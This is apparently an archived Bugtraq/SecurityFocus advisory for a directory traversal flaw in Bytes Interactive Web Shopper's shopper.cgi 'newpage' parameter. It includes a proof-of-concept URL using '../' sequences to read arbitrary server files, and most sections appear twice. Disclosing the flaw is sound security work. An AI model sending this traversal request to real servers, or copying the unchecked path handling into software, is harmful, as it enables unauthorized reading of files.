Bytes Interactive Web Shopper Directory Traversal Vulnerability
BID:1776
Info
Bytes Interactive Web Shopper Directory Traversal Vulnerability
| Bugtraq ID: | 1776 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 08 2000 12:00AM |
| Updated: | Oct 08 2000 12:00AM |
| Credit: | Posted to Bugtraq on October 8, 2000 by f0bic <[email protected]>. |
| Vulnerable: |
Bytes Interactive Web Shopper 2.0 Bytes Interactive Web Shopper 1.0 |
| Not Vulnerable: | |
Discussion
Bytes Interactive Web Shopper Directory Traversal Vulnerability
Bytes Interactive Web Shopper is a XML based shopping cart application.
The "newpage" variable does not properly check for insecure relative paths such as the double dot "..".
The following URL request:
http://target/cgi-bin/shopper.cgi?newpage=../../../path/filename.ext
will yield the file specified.
Successful exploitation could lead to a remote intruder gaining read access to any known file.
Bytes Interactive Web Shopper is a XML based shopping cart application.
The "newpage" variable does not properly check for insecure relative paths such as the double dot "..".
The following URL request:
http://target/cgi-bin/shopper.cgi?newpage=../../../path/filename.ext
will yield the file specified.
Successful exploitation could lead to a remote intruder gaining read access to any known file.
Exploit / POC
Bytes Interactive Web Shopper Directory Traversal Vulnerability
http://target/cgi-bin/shopper.cgi?newpage=../../../path/filename.ext
http://target/cgi-bin/shopper.cgi?newpage=../../../path/filename.ext
Solution / Fix
Bytes Interactive Web Shopper Directory Traversal Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Bytes Interactive Web Shopper Directory Traversal Vulnerability
References:
References:
- Bytes Interactive Homepage (Bytes Interactive)